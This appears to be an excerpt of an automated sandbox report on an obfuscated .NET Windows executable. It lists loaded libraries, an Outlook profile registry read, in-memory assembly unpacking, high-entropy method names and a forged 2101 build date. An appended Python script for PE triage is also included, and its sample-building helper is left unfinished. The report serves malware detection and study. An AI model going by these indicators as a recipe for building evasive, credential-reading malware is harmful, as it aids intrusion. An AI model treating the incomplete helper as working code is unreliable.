Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: VbcXXnmIwPPhh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: VbcXXnmIwPPhh.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: VbcXXnmIwPPhh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: geWD.pdbSHA256 source: VbcXXnmIwPPhh.exe
Source: Binary string: geWD.pdb source: VbcXXnmIwPPhh.exe

Data Obfuscation

Source: VbcXXnmIwPPhh.exe, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32fd858.3.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs .Net Code: W9s2BCu23c System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs .Net Code: W9s2BCu23c System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32f4240.0.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32a52e4.2.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32ae8fc.1.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.5a60000.7.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: VbcXXnmIwPPhh.exe Static PE information: 0xF6BE9C4F [Tue Mar 8 01:03:11 2101 UTC]
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 0_2_0308EF83 push eax; iretd 0_2_0308EF89
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9241 push es; ret 6_2_06DF9244
Source: VbcXXnmIwPPhh.exe Static PE information: section name: .text entropy: 7.877925712281058
Source: 0.2.VbcXXnmIwPPhh.exe.32fd858.3.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, v7TfX0cN66hhgJUJwJ.cs High entropy of concatenated method names: 'ToString', 'tYtEm3rlXp', 'vZaEZQIpk3', 'enfECqHPKk', 'TiREs4OPj4', 'V4sE1AleDf', 'o8jElDFfEH', 'X9YEXlv4sh', 'WhJE57XeeZ', 'sy4EguL75h'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, Ny32pHRu6f6w0bk14d.cs High entropy of concatenated method names: 'EUQxy60RTE', 'GOrxOnVlIn', 'mxyaCSY16D', 'd7gasNaEoC', 'RYVa16poEv', 'ro7alD1Ytv', 'Pj2aX56jE5', 'nvRa5RHSuw', 'zaXagL67RF', 'ijHaM3PHBR'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, SjH6iEglMe4JJag9x8.cs High entropy of concatenated method names: 'GTgTv7jFOs', 'g63T6gTtJJ', 'Un5TBFqG9v', 'RACTJMZ9bi', 'uDUTyXXH8o', 'ttpTIMn7My', 'ixwTOcamDV', 'U8FTGJyhTc', 'DRgT0oSJJc', 'vXTTRDyaMP'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, fLnSLcQsburVYyKgWh.cs High entropy of concatenated method names: 'pIb9MloKhA', 'btn94NtaLA', 'mTK9QfZnoS', 'wRd9894dcU', 'ET59Z9xoO7', 'xL09CQygcx', 'qP89sdBucM', 'Rwp91lgwXE', 'fPj9ls0GM0', 'nks9XUYwAO'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, rlPD0bXvfvPTrMIcH5.cs High entropy of concatenated method names: 'e65TwXhNAU', 'w7ATay3otw', 'vrOTr8r1hQ', 'c6drog7VmU', 'QRvrzRjDHx', 'D5mTdY4DOy', 'XJwTi8ol6A', 'Et7TtSsUv7', 'c1ETWhxGlJ', 'it6T2gL70U'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, LL8myueE5FL4FwPBUS.cs High entropy of concatenated method names: 'IGY7wAn8xX', 'SMf7bnNiMM', 'gai7aBcGKZ', 'gYU7xa46mf', 'Tai7ri1XLD', 'RWM7Tud8cw', 'S477LeGX0v', 'oWQ7jDfCfk', 'X567VkWFsL', 'qgK7k0yM4F'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs High entropy of concatenated method names: 'x2HWAJrm7n', 'YRBWwTlYhH', 'NITWbSnOJ8', 'oykWaLIb5Y', 'QgSWx7XFW1', 'el2WrcOKqI', 'IlEWTQlXkN', 'XqqWLYjyje', 'AZZWjYFYgF', 'eZoWVEVCrl'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, nH6PHboIq1eMy9lsOx.cs High entropy of concatenated method names: 'ackui3ikbG', 'gSuuWAk9xU', 'vdRu2MdvAZ', 'SFIuws18kO', 'yPpub68xXI', 'OkEuxOlrHJ', 'zp8urCGwpj', 'kWA7FodH4s', 'kgH7eVO1XV', 'ktZ7DwkVEe'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, kUuY6siW5vyxdHktXRf.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lNPfQMtMH6', 'fkjf8cg9YX', 'CT4fc0NUBi', 'F4vfU3T65j', 'Py4fnEdgPE', 'TU0fSVvsBc', 'PXIfFg2SIF'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, KdrMBNtPmnWruc2Qo7.cs High entropy of concatenated method names: 'bNhBtReFj', 'YwuJEL0k0', 'STtIOekSi', 'TA5O2Qx0W', 'Uwx0i4UAw', 'SKZRHMqIX', 'FaWcWiVd8IfEJwL3Zh', 'aP4F1ZkeqAoDHx4Lni', 'hY17K8DD4', 'YC2fqW3vm'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, eRvY0DhwwMDag3tMd8.cs High entropy of concatenated method names: 'kEKrAhwBHI', 'QSIrbFKx8p', 'ktdrxpX7HE', 'J8drTrlP1a', 'NQZrLqnoFZ', 'Ddvxn0inuX', 'uhsxSNldTl', 'uZmxFBsHXU', 'yk3xe1MXrB', 'eqtxDwg8Hs'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, L6vjyKid9aDaoe5HiaO.cs High entropy of concatenated method names: 'tKYuvg3uhQ', 'dkau6uePqw', 'LNruBiEWeX', 'bvEuJGXBRD', 'JXvuy30LoP', 'i90uII0vV5', 'OpSuOBSVNI', 'VUEuG1wI7u', 'pYqu0SUl47', 'GmmuRirhCu'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, p94yMyHuCERHsEo3os.cs High entropy of concatenated method names: 'UsUKGd1mkt', 'U6CK0pf1S0', 'S3PKhLWoSg', 'UerKZ8wgdv', 'aD9KsVHUvx', 'SaAK1fhsGJ', 'vllKXTUJdY', 'AOYK5k7Qcf', 'WbUKM7gBsa', 'uhFKmU0jCt'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, HBDxB2GmiOduxajCiD.cs High entropy of concatenated method names: 'VG8bQdamFt', 'Mcsb8Neh6h', 'j76bcyQceC', 'rqobUIVvGH', 'GOmbn1VCfa', 'XEBbSAXcxL', 'cY6bFGmfXk', 'rZ0be0CNYh', 'FPbbDSgUqK', 'NdcbonGkta'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, qHKnAkDX8ytgCp1mSc.cs High entropy of concatenated method names: 'XcY7hRUl9B', 'Lf07Z6ZgBh', 'dTS7CjD8xQ', 'I7x7s45AYg', 'XK67QEMgwi', 'M0i719PkGi', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, sjbL9g05wUgikYyDq1.cs High entropy of concatenated method names: 'm27aJnf468', 'bAfaI74f6b', 'JqVaGiBOTZ', 'Cfsa0q7xQy', 'eDra9nnYur', 'qUOaENg53T', 'l30aN5OS2T', 'ttJa7hxU2t', 'I0FauJhQu3', 'VNAafHbWpQ'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, XOPcij2EZTlP5u1gAE.cs High entropy of concatenated method names: 'oiZiTBDxB2', 'OiOiLduxaj', 'N5wiVUgikY', 'ADqik1gy32', 'gk1i94dARv', 'v0DiEwwMDa', 'h9K238GjxV4a826a1t', 'AXiI3JJh6XSFe6oQp7', 'waYiijekAY', 'AEpiW4fqTH'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, qiNcDkbGW6sJO9UAgD.cs High entropy of concatenated method names: 'Dispose', 'p7uiDLa8Py', 'MSFtZuGERn', 'TOyqqR1KP0', 'P5Lio8myuE', 'MFLiz4FwPB', 'ProcessDialogKey', 'TS7tdHKnAk', 'K8ytitgCp1', 'OScttkH6PH'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, v7TfX0cN66hhgJUJwJ.cs High entropy of concatenated method names: 'ToString', 'tYtEm3rlXp', 'vZaEZQIpk3', 'enfECqHPKk', 'TiREs4OPj4', 'V4sE1AleDf', 'o8jElDFfEH', 'X9YEXlv4sh', 'WhJE57XeeZ', 'sy4EguL75h'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, Ny32pHRu6f6w0bk14d.cs High entropy of concatenated method names: 'EUQxy60RTE', 'GOrxOnVlIn', 'mxyaCSY16D', 'd7gasNaEoC', 'RYVa16poEv', 'ro7alD1Ytv', 'Pj2aX56jE5', 'nvRa5RHSuw', 'zaXagL67RF', 'ijHaM3PHBR'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, SjH6iEglMe4JJag9x8.cs High entropy of concatenated method names: 'GTgTv7jFOs', 'g63T6gTtJJ', 'Un5TBFqG9v', 'RACTJMZ9bi', 'uDUTyXXH8o', 'ttpTIMn7My', 'ixwTOcamDV', 'U8FTGJyhTc', 'DRgT0oSJJc', 'vXTTRDyaMP'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, fLnSLcQsburVYyKgWh.cs High entropy of concatenated method names: 'pIb9MloKhA', 'btn94NtaLA', 'mTK9QfZnoS', 'wRd9894dcU', 'ET59Z9xoO7', 'xL09CQygcx', 'qP89sdBucM', 'Rwp91lgwXE', 'fPj9ls0GM0', 'nks9XUYwAO'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, rlPD0bXvfvPTrMIcH5.cs High entropy of concatenated method names: 'e65TwXhNAU', 'w7ATay3otw', 'vrOTr8r1hQ', 'c6drog7VmU', 'QRvrzRjDHx', 'D5mTdY4DOy', 'XJwTi8ol6A', 'Et7TtSsUv7', 'c1ETWhxGlJ', 'it6T2gL70U'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, LL8myueE5FL4FwPBUS.cs High entropy of concatenated method names: 'IGY7wAn8xX', 'SMf7bnNiMM', 'gai7aBcGKZ', 'gYU7xa46mf', 'Tai7ri1XLD', 'RWM7Tud8cw', 'S477LeGX0v', 'oWQ7jDfCfk', 'X567VkWFsL', 'qgK7k0yM4F'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs High entropy of concatenated method names: 'x2HWAJrm7n', 'YRBWwTlYhH', 'NITWbSnOJ8', 'oykWaLIb5Y', 'QgSWx7XFW1', 'el2WrcOKqI', 'IlEWTQlXkN', 'XqqWLYjyje', 'AZZWjYFYgF', 'eZoWVEVCrl'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, nH6PHboIq1eMy9lsOx.cs High entropy of concatenated method names: 'ackui3ikbG', 'gSuuWAk9xU', 'vdRu2MdvAZ', 'SFIuws18kO', 'yPpub68xXI', 'OkEuxOlrHJ', 'zp8urCGwpj', 'kWA7FodH4s', 'kgH7eVO1XV', 'ktZ7DwkVEe'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, kUuY6siW5vyxdHktXRf.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lNPfQMtMH6', 'fkjf8cg9YX', 'CT4fc0NUBi', 'F4vfU3T65j', 'Py4fnEdgPE', 'TU0fSVvsBc', 'PXIfFg2SIF'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, KdrMBNtPmnWruc2Qo7.cs High entropy of concatenated method names: 'bNhBtReFj', 'YwuJEL0k0', 'STtIOekSi', 'TA5O2Qx0W', 'Uwx0i4UAw', 'SKZRHMqIX', 'FaWcWiVd8IfEJwL3Zh', 'aP4F1ZkeqAoDHx4Lni', 'hY17K8DD4', 'YC2fqW3vm'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, eRvY0DhwwMDag3tMd8.cs High entropy of concatenated method names: 'kEKrAhwBHI', 'QSIrbFKx8p', 'ktdrxpX7HE', 'J8drTrlP1a', 'NQZrLqnoFZ', 'Ddvxn0inuX', 'uhsxSNldTl', 'uZmxFBsHXU', 'yk3xe1MXrB', 'eqtxDwg8Hs'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, L6vjyKid9aDaoe5HiaO.cs High entropy of concatenated method names: 'tKYuvg3uhQ', 'dkau6uePqw', 'LNruBiEWeX', 'bvEuJGXBRD', 'JXvuy30LoP', 'i90uII0vV5', 'OpSuOBSVNI', 'VUEuG1wI7u', 'pYqu0SUl47', 'GmmuRirhCu'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, p94yMyHuCERHsEo3os.cs High entropy of concatenated method names: 'UsUKGd1mkt', 'U6CK0pf1S0', 'S3PKhLWoSg', 'UerKZ8wgdv', 'aD9KsVHUvx', 'SaAK1fhsGJ', 'vllKXTUJdY', 'AOYK5k7Qcf', 'WbUKM7gBsa', 'uhFKmU0jCt'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, HBDxB2GmiOduxajCiD.cs High entropy of concatenated method names: 'VG8bQdamFt', 'Mcsb8Neh6h', 'j76bcyQceC', 'rqobUIVvGH', 'GOmbn1VCfa', 'XEBbSAXcxL', 'cY6bFGmfXk', 'rZ0be0CNYh', 'FPbbDSgUqK', 'NdcbonGkta'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, qHKnAkDX8ytgCp1mSc.cs High entropy of concatenated method names: 'XcY7hRUl9B', 'Lf07Z6ZgBh', 'dTS7CjD8xQ', 'I7x7s45AYg', 'XK67QEMgwi', 'M0i719PkGi', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, sjbL9g05wUgikYyDq1.cs High entropy of concatenated method names: 'm27aJnf468', 'bAfaI74f6b', 'JqVaGiBOTZ', 'Cfsa0q7xQy', 'eDra9nnYur', 'qUOaENg53T', 'l30aN5OS2T', 'ttJa7hxU2t', 'I0FauJhQu3', 'VNAafHbWpQ'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, XOPcij2EZTlP5u1gAE.cs High entropy of concatenated method names: 'oiZiTBDxB2', 'OiOiLduxaj', 'N5wiVUgikY', 'ADqik1gy32', 'gk1i94dARv', 'v0DiEwwMDa', 'h9K238GjxV4a826a1t', 'AXiI3JJh6XSFe6oQp7', 'waYiijekAY', 'AEpiW4fqTH'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, qiNcDkbGW6sJO9UAgD.cs High entropy of concatenated method names: 'Dispose', 'p7uiDLa8Py', 'MSFtZuGERn', 'TOyqqR1KP0', 'P5Lio8myuE', 'MFLiz4FwPB', 'ProcessDialogKey', 'TS7tdHKnAk', 'K8ytitgCp1', 'OScttkH6PH'
Source: 0.2.VbcXXnmIwPPhh.exe.32f4240.0.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.32a52e4.2.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.32ae8fc.1.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.5a60000.7.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
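Added example, not part of the Joe Sandbox report: a standard-library Python triage script that pulls the same static indicators out of any PE on disk that the report lists for this sample. It decodes the COFF TimeDateStamp (here 0xF6BE9C4F, a date in 2101, so a forged or clobbered build time), lists the DllCharacteristics flags, checks whether the IMAGE_DIRECTORY_ENTRY_DEBUG and IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR directories are populated (a CLR header means a managed .NET image, which is what makes the Assembly.Load(byte[]) unpacking above possible), and computes per-section Shannon entropy (the sample's .text is at 7.88, close to the 8.0 ceiling, the signature of an encrypted embedded payload). The 7.0 entropy threshold is an assumed rule of thumb, not a value from the report. The build_sample_pe() helper constructs a synthetic minimal PE32 so the script runs offline; it is not the analysed sample, and its section bytes are a constructed pattern.

```python
import math
import struct
from datetime import datetime, timedelta, timezone
from typing import Optional

# Data directory indices and DllCharacteristics bits, as defined in the PE/COFF spec.
IMAGE_DIRECTORY_ENTRY_DEBUG = 6
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}
HIGH_ENTROPY = 7.0  # assumed threshold: packed/encrypted sections usually sit above it


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_timestamp(ts: int) -> datetime:
    """Decode a COFF TimeDateStamp by arithmetic, so far-future values (year 2101) decode everywhere."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)


def triage_pe(data: bytes, now: Optional[datetime] = None) -> dict:
    """Extract the static indicators a sandbox reports for a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE: missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, ts, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:        # PE32: data directories start at optional header offset 96
        dirs_off = 96
    elif magic == 0x20B:      # PE32+: they start at offset 112
        dirs_off = 112
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]          # DllCharacteristics (same offset in both)
    ndirs = struct.unpack_from("<I", data, opt + dirs_off - 4)[0]   # NumberOfRvaAndSizes
    dirs = [struct.unpack_from("<II", data, opt + dirs_off + 8 * i) for i in range(ndirs)]

    def dir_present(idx: int) -> bool:
        return idx < len(dirs) and dirs[idx][0] != 0 and dirs[idx][1] != 0

    # Section table follows the optional header; entropy is computed over raw file bytes.
    sections = {}
    for i in range(nsections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections[name.rstrip(b"\0").decode("ascii", "replace")] = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])

    compiled = pe_timestamp(ts)
    now = now or datetime.now(timezone.utc)
    return {
        "timestamp_raw": ts,
        "timestamp_utc": compiled.strftime("%Y-%m-%d %H:%M:%S"),
        "timestamp_in_future": compiled > now,
        "dll_characteristics": [name for bit, name in DLL_CHARACTERISTICS.items() if dll_chars & bit],
        "has_debug_directory": dir_present(IMAGE_DIRECTORY_ENTRY_DEBUG),
        "is_dotnet": dir_present(IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR),
        "section_entropy": sections,
        "high_entropy_sections": [n for n, e in sections.items() if e >= HIGH_ENTROPY],
    }


def build_sample_pe(timestamp: int = 0xF6BE9C4F) -> bytes:
    """Constructed minimal PE32 with a CLR header and a uniform-byte .text section.
    A stand-in for offline testing, not the analysed sample."""
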